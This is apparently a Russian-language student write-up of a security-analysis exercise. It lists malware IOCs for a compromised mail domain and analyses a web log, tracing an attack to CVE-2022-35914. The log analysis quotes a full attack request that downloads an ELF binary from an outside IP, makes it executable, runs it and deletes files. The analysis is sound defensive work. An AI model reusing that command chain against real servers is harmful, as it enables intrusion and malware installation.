42 lines
4.4 KiB
Markdown
42 lines
4.4 KiB
Markdown
# Задание 1
|
||
|
||
Согласно найденным отчётам по хостнейму и IP-адресу:
|
||
|
||
https://any.run/report/6dd737167202586feffdf37f3883461de94a1c01051a32b30db66fc1db5a681d/11691868-8155-4601-9cc5-ebdd94a77b79
|
||
https://otx.alienvault.com/indicator/ip/103.53.42.223
|
||
|
||
Данный домен скорее всего участвовал в рассылке вредоносных файлов.
|
||
|
||
1. В список IOC можно предложить указать хэши вредоносных файлов, связанных с данным доменом, например:
|
||
|
||
```
|
||
bae8ebd43fe0bc8c5bce6d5b8986589434e434b9a0023c7f535e6269858e4d7d
|
||
6DD737167202586FEFFDF37F3883461DE94A1C01051A32B30DB66FC1DB5A681D
|
||
fde3341015c7de7383bca14b2e62336bd685f1abc4105ad5d4eba6d13da09f15
|
||
65f81879b5421a5683de158629677f153d046ce7dc81fb770d3b2ca9cbd8d47f
|
||
17d1bbe4053498d4a7db1eda9e477d7d86b1b538afa4b9a9f7579676459c17c4
|
||
b963fdcb37b1ea21efd4d930112e3e7636d16160699eaa09d4e1e23a2f12f00a
|
||
```
|
||
|
||
Также можно добавить IP-адрес данного домена, так как взломан может целый почтовый сервис, который хостит множество почтовых доменов (103.53.42.223)
|
||
|
||
Дополнительно, можно предположить, что сайт хостится на сервисе (*.webhostbox.net), все поддомены можно также добавить в список IOC.
|
||
|
||
2. Сам хост по совокупности не похож на зараженный в привычном понимании (родительский домен в каких-либо базах вредоносов не находится), вероятнее всего был взломан почтовый сервер и хоста (в отчетах имеются даже учетные данные, с помощью которых проводилась рассылка), после чего он использовался для спам рассылок вредоносных файлов (значатся различные семейства Trojan и шифровальщиков, например AgentTesla, ZeuS) с других уже зараженных машин.
|
||
|
||
# Задание 2
|
||
|
||
Самым важным моментом логов можно считать следующую запись:
|
||
```
|
||
47.243.78.78 - - [21/Oct/2022:00:33:56 +0300] "GET /vendor/htmlawed/htmlawed/233.php?123456=rm%20-f%20linux*;wget%20http://67.198.237.116/linux_x86;curl%20-O%20http://67.198.237.116/linux_x86;chmod%20777%20*;./linux_x86;rm%20-f%20linux_x86.*;rm%20-f%20md*;rm%20-f%20x* HTTP/1.1" 200 5800 "-" "python-requests/2.27.1"
|
||
```
|
||
Это запрос с User-agent "python-requests/2.27.1" возвративший 200 ответ.
|
||
User-agent python-requests говорит о том, что данный запрос вероятно создан с помощью библиотеки Python. А 200 ответ говорит, что сервер вернул некое содержимое и отработал запрос. А куча bash-команд в запросе говорит нам о вероятной эксплуатации атаки типа PHP-Injection (https://owasp.org/www-community/attacks/Code_Injection)
|
||
|
||
1. ELF-файл скорее всего скачивается с помощью wget с хоста http://67.198.237.116, после чего происходит выдача ему привилегий (chmod) и запуск (./linux_x86)
|
||
|
||
Имя elf-файла -- linux_x86.
|
||
|
||
2. Вероятнее всего с активностью ассоциируется уязвимость CVE-2022-35914 (https://nvd.nist.gov/vuln/detail/CVE-2022-35914). Понять это можно по пути до скрипта в запросе (/vendor/htmlawed/htmlawed/233.php), при этом в уязвимости описывается эксплуатация через POST-запрос и другое имя уязвимого скрипта, так что можно предположить, что 233.php уже является PHP-шеллом, загруженным на уязвимый сервер в результате эксплуатации.
|
||
|
||
Итоговый ответ (по форме: имя ELF-файла (слитно), CVE-идентификатор уязвимости (слитно)): linux_x86, CVE-2022-35914 |